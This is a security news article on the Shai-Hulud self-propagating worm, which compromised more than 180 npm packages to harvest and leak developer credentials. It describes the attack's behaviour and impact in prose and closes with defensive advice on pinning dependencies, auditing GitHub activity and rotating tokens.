Major Supply Chain Attack Affects Over 180 NPM Packages
A recent supply chain attack has sent ripples through the software development community, impacting more than 180 packages on the Node Package Manager (NPM). This incident, identified as the Shai-Hulud attack, employs self-replicating malware to siphon off sensitive data, worsen cybersecurity risks, and turn previously private repositories into public ones.
Understanding the Attack
On September 15, Daniel dos Santos Pereira, a senior software engineer at Loka, raised the alarm about the initial signs of this attack. It all began the previous day when less than a dozen malicious packages were published. However, the scope of the attack rapidly expanded, culminating in the release of around 50 compromised package versions that same day. By September 16, the number had surged to over 180, according to warnings from Ox Security.
Affected Packages
Among the notable packages affected by this attack are well-known libraries such as @ctrl/tinycolor, which garners over 2 million downloads weekly, and ngx-bootstrap, with approximately 300,000 downloads. Other impacted packages include ng2-file-upload and various products from CrowdStrike, which were promptly removed following the identification of the attack.
The compromised packages contained a post-install script designed to retrieve the TruffleHog secret scanning tool. This malware aimed to hunt down sensitive information, including environment variables and cloud keys exposed through the Instance Metadata Service (IMDS).
Malicious Behavior
One of the most alarming features of the Shai-Hulud attack is the script’s capability to validate collected credentials. Should it identify GitHub tokens, the malware goes a step further, creating public repositories labeled “Shai-Hulud Migration” and dumping the stolen secrets into them. Additionally, it sets up a GitHub Actions workflow that exfiltrates secrets to a hardcoded webhook, which, unfortunately, was disabled after surpassing the callback limits.
Fearfully, Cybersecurity firm Socket has reported over 700 public repositories on GitHub with the Shai-Hulud Migration label, all appearing synchronously with the attack’s progression.
Links to Previous Attacks
The methodical manner in which the attack unfolded bears resemblance to a prior supply chain breach known as the s1ngularity attack, which targeted known victims from the earlier incident. What sets Shai-Hulud apart is its ability to exploit existing NPM tokens. By doing so, it not only spreads but also updates any packages under the control of compromised maintainers to amplify its reach.
Self-Propagating Nature
According to Wiz, the Shai-Hulud attack behaves like a self-propagating worm. When a compromised package comes into contact with any additional NPM tokens in a victim’s environment, it will automatically publish malicious package versions for any accessible packages, escalating the epidemic.
StepSecurity’s analysis indicates that the attack specifically targets execution environments on Linux and macOS, pointedly ignoring Windows machines.
Payload Variations
Security experts at JFrog have noted that several variations of the data-stealing payload were injected into the harmful package versions. This code has been observed attempting to extract GitHub, NPM, AWS, and Google Cloud credentials, along with Atlassian keys and Datadog API keys. Some iterations have shown signs of adaptation over the course of the attack, with one particularly focusing on Azure credentials while others choose to hide the repository from public view.
Data Breach Impact
The fallout from this attack is significant. According to GitGuardian, the breach has led to the public exposure of 278 secrets, including 90 directly sourced from local machines and 188 through compromised workflows. Although many of these credentials have been revoked quickly, some, particularly GitHub API tokens, have remained active, potentially leading to further vulnerabilities.
Recommendations for Users
To mitigate the risk of infection, developers should exercise caution regarding any NPM packages with newly released versions that lack corresponding updates on GitHub. It’s prudent to pin dependencies to prevent unexpected package modifications. Wiz notes that even though there has been no recent creation of new Shai-Hulud repositories, the risk persists as compromised accounts could still be leveraged to catalyze further attacks.
Vigilance Is Key
To help identify potential compromises, users are encouraged to audit GitHub account activity. This includes checking for any newly created repositories or branches and scrutinizing for repositories named Shai-Hulud or Shai-Hulud Migration that mention their organization. Regularly reviewed GitHub audit logs can assist in detecting any suspicious API calls.
If any signs of compromise are uncovered, it’s critical for users to revoke and re-issue their GitHub and NPM tokens, SSH, and API keys, and scrutinize environment variable secrets before reinstalling all affected packages.
The Ongoing Threat
As cyber threats continue to evolve, Shai-Hulud is the third major incident impacting the NPM ecosystem in a short timeframe, following the s1ngularity incident and the compromise affecting Josh Junon (Qix), whose packages collectively see billions of downloads each week.
The relevant advice from cybersecurity professionals emphasizes the importance of understanding software environments. Organizations should be proactive in auditing dependencies, maintain Software Bills of Materials (SBOMs), and reinforce authentication and access controls to counter such growing vulnerabilities.
In an era where attacks on the supply chain are becoming more commonplace, preparedness and vigilance are essential for developers and organizations alike. The Shai-Hulud attack serves as a stark reminder of the need for robust security measures to safeguard sensitive information within the software development ecosystem.
